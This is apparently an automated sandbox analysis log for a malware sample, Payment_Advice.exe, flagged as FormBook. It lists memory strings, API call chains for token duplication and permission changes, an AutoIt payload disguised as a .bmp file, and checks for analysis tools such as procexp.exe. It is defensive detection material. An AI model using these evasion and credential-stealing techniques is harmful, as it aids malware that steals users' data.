          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3hx:cmemstr_f03d2427-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: suvwtmemstr_6bf962d4-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$8suvwtmemstr_3a65d753-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$@j@memstr_07a3b750-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z3l$ memstr_cd341c0b-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$3l$0memstr_5aadfe02-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$ 3l$memstr_db6ccd99-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w83w$3wmemstr_2b00497b-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3w 373wmemstr_cc98a12d-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$(3t$memstr_f50b7f59-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$,@#memstr_feedc4ba-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$03tmemstr_b679ae16-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,3tmemstr_a6f9c0e2-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$twj8[memstr_0c187142-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tfv-j@y;memstr_c5e69b98-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \$hvwmemstr_bb7de386-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?vuuj@^+memstr_3709732a-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$xwj?_memstr_e9989e7a-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vzj@[+memstr_59273d9f-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pvmemstr_b027fe0e-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t7v"j@z;memstr_b2f81c30-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t9vj@^+memstr_c7ffd2cd-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j"zf;memstr_106a78ed-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u(f9vmemstr_59ffc9ae-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$xbv3memstr_9dcdba02-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tj-xfmemstr_1f4e13f6-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yy_^[memstr_b1a79d5c-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pssssssh memstr_3f3b535b-0
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: suvw3memstr_95e2666f-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t_hl<cmemstr_aa63e163-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t_hl<cvmemstr_ba30a2a3-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h`<cvmemstr_10ae30fe-0
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4(=cmemstr_44b99768-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8d=cmemstr_0ad968fb-0
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<t=cmemstr_415537d4-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$@h=cmemstr_5d9cd98a-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$d8>cmemstr_23979bb1-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$hp>cmemstr_b69c3849-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$lh>cmemstr_8b3a45af-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0cssjmemstr_72979969-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tysswvmemstr_11ade21d-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pwhhbcmemstr_a8e1acfa-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0c_^][memstr_0a100e78-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0cswssmemstr_5cd02a26-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0csuusmemstr_787768c0-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pjvh`memstr_19191b03-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u'hcchmemstr_d55cdaee-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _]^[ymemstr_f83f5089-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<psmemstr_5698cbe8-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$$+d$ memstr_5b7b4e70-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hsuvwmemstr_d017d711-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<pvmemstr_62f2d7dc-a
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$+l$ memstr_79f2592f-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vwjd_memstr_8f07b103-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0cj5hmemstr_35c026d6-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppwvjmemstr_509db1b4-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t/h`#amemstr_6175fa0b-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9{prmemstr_b14d9a62-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,9{prmemstr_661411d1-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xlvjjmemstr_c01caa3c-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;l$ rmemstr_681d8102-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9t$ vlmemstr_1dd315c4-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;t$ rmemstr_5cf1ef6a-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;l$ smemstr_6623bba6-0
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;d$ rmemstr_24c10e94-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #d$$pmemstr_0fc4fbbb-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c#\$$memstr_97a59ad0-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^_][ymemstr_e00360d3-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }ucwjsmemstr_6e311578-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qqsvwmemstr_30b0b7a7-0
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h`#ahmemstr_209cf0db-0
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$suvmemstr_f82dd867-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uxf9ymemstr_db90ca1d-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9uxf9ymemstr_dde4cafd-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,h2memstr_2a8ac4a3-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t=@~ memstr_7dc9ff98-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dltf+memstr_d608e69c-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dkvwumemstr_365eb7da-a
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: th9.udmemstr_4f84588f-0
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$$t&wmemstr_e13fe8b2-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <k_^][memstr_44b5e5bb-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \l_^[memstr_5c6502a5-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$,tmemstr_3d8704f0-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s?;n|t:memstr_d77cd50b-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h-s*jmemstr_22917339-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y+l$ memstr_23269f36-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f|pswmemstr_0d81c729-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rv9|$memstr_35c56ca1-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h-s.jmemstr_70063f97-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ju/uqmemstr_1a6b4e0c-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$ ;l$(rmemstr_24f9725e-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ ;t$$rmemstr_1a517423-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y+l$0memstr_0aa423d6-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8pwmemstr_b0bc0efa-a
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \$@uvmemstr_94928dd3-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;l$,|3;memstr_3ff74dce-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y+l$4memstr_5c1410f4-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0j$y+memstr_f9427bf6-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,y+memstr_677ac659-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j y+l$0memstr_4472a18b-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ro9|$(samemstr_c2e66c4b-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8pqmemstr_3e754682-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tdf9+trmemstr_aa1bf8f5-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a;t$$memstr_f9ab006c-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kd$ a;memstr_1927e7db-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0@fmemstr_b8fc94a9-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _suvwmemstr_2409cb2a-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0pjememstr_3fe3b637-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^(^[ymemstr_6d43acb7-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tj9o ue9omemstr_0ef7e557-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uuuujmemstr_b7e9103e-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hpfcvmemstr_225e4ed6-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j xf9memstr_09e9f52b-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hpfcvmemstr_66a836dc-5
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_001D1A91
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00173312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00173312
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DEB81 mouse_event,6_2_001DEB81
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_001D1EF3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_001D13F2
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000788F000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp, ewdbwwfpdh.bmp.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603000018.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603076190.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601700548.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: ewdbwwfpdh.bmp, explorer.exe, 0000000F.00000002.3850804547.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000F.00000000.1584312886.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3843273425.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540709138.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
          Source: explorer.exe, 0000000F.00000002.3843273425.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.1584701050.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
          Source: fjrpidauk.jpg.0.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
          Source: explorer.exe, 0000000F.00000002.3843273425.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.1584701050.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000F.00000000.1592153566.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0051AF0F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,16_2_00A46854
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00A48572
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00A49310
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051F654 cpuid 0_2_0051F654
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0051DF1E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001ABCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_001ABCF2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001CE5F8 GetUserNameW,6_2_001CE5F8
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050B146 GetVersionExW,0_2_0050B146
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000002.1607858795.0000000001026000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1602301908.0000000001025000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUI.exe
          Source: ewdbwwfpdh.bmp, 00000006.00000002.1607737663.000000000100B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1604570490.000000000100A000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603782046.000000000100A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
          Source: ewdbwwfpdh.bmp, 00000006.00000002.1607737663.000000000100B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1604570490.000000000100A000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603782046.000000000100A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
